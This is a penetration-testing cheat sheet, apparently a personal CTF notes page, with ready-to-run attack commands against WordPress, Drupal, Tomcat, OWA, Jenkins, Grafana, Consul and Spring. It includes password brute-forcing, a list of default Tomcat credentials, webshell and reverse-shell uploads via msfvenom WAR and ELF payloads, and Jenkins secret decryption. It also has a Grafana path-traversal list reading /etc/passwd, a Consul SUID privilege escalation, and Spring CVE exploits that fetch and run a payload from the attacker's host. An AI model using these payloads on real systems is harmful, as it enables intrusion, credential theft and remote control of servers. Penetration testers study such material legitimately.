CMS / Servers / Others

00. Webroot

/var/www/html/            # Apache	
/usr/local/nginx/html/    # Nginx	
c:\inetpub\wwwroot\       # IIS	
C:\xampp\htdocs\          # XAMPP

01. Wordpress

• Scan

## ------------------| Basic
wpscan -e vt,tt,u,ap --url <URL>
wpscan -e vt,tt,u,ap -o wpscan.log --url <URL>

## ------------------| Plugin detection
wpscan -e ap --plugins-detection aggressive --url <URL>

## ------------------| Default Locations
/wp-content/plugins/akismet/index.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/twentytwentyone/404.php
/wp-content/themes/twentytwentytwo/404.php
/wp-content/plugins/revslider/public/index.php
/wp-content/plugins/contact-form-7/wp-contact-form-7.php

• Bruteforce password/username

## ------------------| With WPScan
wpscan -U <UserName/List> -P <Password/List> --url <URL>

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python2 wpforce.py -w <Password/List> -i <UserName/List> -u <URL>

## ------------------| With WpCrack
wget https://raw.githubusercontent.com/22XploiterCrew-Team/WpCrack/1.x/WpCrack.py          
python WpCrack.py -t <URL> --p <Password/List> -u <UserName>

• Username/Password

select user_login,user_pass from wp_users;

• Webshell

## ------------------| With WPForce
git clone https://github.com/n00py/WPForce.git && cd WPForce
python yertle.py -u "<username>" -p "<password>" -t "<URL>" -i

## Or

## ------------------| Create Plugin
wget https://raw.githubusercontent.com/leonjza/wordpress-shell/master/shell.php
zip -r shell.zip shell.php

## ------------------| Upload to
http://<IP>/wp-admin/plugin-install.php

## ------------------| Execute shell
http://<IP>/wp-content/plugins/shell/shell.php?cmd=id
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')"
 
## ------------------| Reverse shell (default port:443)
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>"})')"                        
curl -v "http://<IP>/wp-content/plugins/shell/shell.php?$(python -c 'import urllib; print urllib.urlencode({"ip":"<IP>","port":"4545"})')"

02. Joomla

## ------------------| Identify version
# Navigate to 
/administrator/manifest/files/joomla.xml
# Check this tag
<version>3.7.5</version>

## ------------------| Run scan
joomscan -u <URL>

03. Drupal

03.1 Enumerations

## ------------------| Username enumeration
### Check if we can register new user (search for "name is already taken")
/user/register

### Check access status 
/user/<number>
/user/1            
### is 403 --> user exist
### is 404 --> doesn't exist

## ------------------| Hidden pages
wfuzz -c -z range,1-500 --hc 404 http://<IP>/node/FUZZ

03.2 Upload shell

## ------------------| Check "plugin php" status
/modules/php
### if status is 403 --> "plugin php" exists/installed

## ------------------| Install "plugin php"
Modules --> Check for PHP "Filter" --> Save

## ------------------| Upload shell
Add content --> Basic Page/Article --> <paste_shell> --> select "PHP code in Text format" --> Preview

04. Tomcat

## ------------------| Endpoint permissions
/manager/html      # <--- roles="manager-gui" 
/manager/text/list # <--- roles="manager-script"  [If we have /manager, Then we can use curl to upload war file :)]  
/host-manager/html # <--- roles="admin-gui"

## ------------------| Path Normalization
/manager/notexsits/..;/html/
/manager/;name=notexsits/html/
/;name=notexsits/manager/        # <--- not work for upload war files
/notexsits/..;/manager/          # <--- not work for upload war files
## Remember to put '/' at the end ^

## ------------------| Common Creds
tomcat:s3cret
tomcat:s3cr3t
admin:s3cr3t
tomcat:tomcat
admin:admin
admin:tomcat
tomcat:Tomcatadm
tomcat:TomcatAdm
tomcat:Tomcatadn
admin:<NOTHING>

## ------------------| Upload paths
/manager/deploy?war=file&path=/shell    ## Tomcat6
/manager/text/deploy?path=/shell        ## Tomcat7 and above

## ------------------| Upload via curl
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
curl -u 'username:password' -T shell.war http://<IP>:8080/manager/text/deploy?path=/h4rithd      

## ------------------| Manually Upload  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<HostIP> LPORT=4545 -f war > shell.war  
## Then put the shell.war file to \tomcat\webapps\shell.war directory
## Then use \bin\startup.[sh/bat] file to restart the service and extract the war file.
## Now you can use http://<IP>/shell/

05. Nginx

• Path traversal via misconfigured NGINX alias.

## ------------------| If code look like this
location /admin { 
    <--code-->
}

## ------------------| It has LFI; try this
admin../config.php

05. SharePoint / OWA

05.1 SharePoint

## ------------------| Important directories 
/_layouts/viewlsts.aspx

05.2 OWA

## ------------------| Setup
git clone https://github.com/byt3bl33d3r/SprayingToolkit      
cd SprayingToolkit/
pip3 install -r requirements.txt

## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt

## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01

06. Jenkins

• Interesting endpoints

/manage
/script

• Configaration files

## ------------------| Linux
/var/lib/jenkins/users/admin_*/config.xml
/var/lib/jenkins/config.xml

## ------------------| Windows
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\users\admin_*\config.xml
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\master.key 
C:\Users\<USER>\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret

• Reset password [Read full post from here]

## ------------------| Methord II
## Edit following file
sudo vi /var/lib/jenkins/users/admin_5103638315737262589/config.xml
## Bcrypt password will store under <passwordHash> tag [here i used h4rithd]
<passwordHash>#jbcrypt:$2a$04$gcRUhfwsCQlQKbSTgpFCKOdV9uQuD5/vXwiU1bgULDzW4JB/pNp5S</passwordHash>
## Restart the service
sudo systemctl restart jenkins

## ------------------| Decrypt Password
## If you have access to /script then follow below url
## Get password hash from \users\config.xml
hudson.util.Secret.decrypt '<HASH>'
## If not,
## Download following files
\users\admin_17207690984073220035\config.xml
\secrets\master.key 
\secrets\hudson.util.Secret
## Download tool
wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py
## Execute
python jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml

• Remote Code Execution

Low level user

• Create New Job

• Schedule Method

• Trigger Remotely Method

## ------------------| Trigger the job
curl "http://[username]:[token]@[host]/job/[job name]/build?token=[token name]" 
## Ex: curl "http://h4rithd:11afe9af0327e90fed163da849a39837bc@object.htb:8080/job/TestRun/build?token=h4rithdToken"             

07. Grafana

• Best

• Config files

## ------------------| 
/etc/grafana/grafana.ini
$WORKING_DIR/conf/defaults.ini
/usr/local/etc/grafana/grafana.ini

• Unauthorized reading of files in Grafana [CVE-2021-43798] - videoPOC

/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

08. Consul

echo 'chmod 4755 /bin/dash' > /dev/shm/test.sh
curl --header "X-Consul-Token: <TOKEN-********-****>" --request PUT -d '{"ID": "meow", "Name": "meow", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/dev/shm/test.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
dash -p

09. Spring Framework

• Spring4Shell [CVE-2022-22965]

### Spring Boot version 2.6.5 
## ------------------| Manual
wget https://raw.githubusercontent.com/sunnyvale-it/CVE-2022-22965-PoC/main/exploit-core.py
python3 exploit-core.py --url http://10.10.11.204:8080/

• Spring Cloud Function Vulnerability(CVE-2022-22963)

## ------------------| Manual
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4545 -f elf > h4rithd.elf
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("curl <IP>/h4rithd.elf -o /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'
curl -i -s -k -X 'POST' -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("/tmp/h4rithd")' -H 'Content-Type: application/x-www-form-urlencoded' 'http://10.10.11.204:8080/functionRouter'

## ------------------| Metasploit
use exploit/multi/http/spring_cloud_function_spel_injection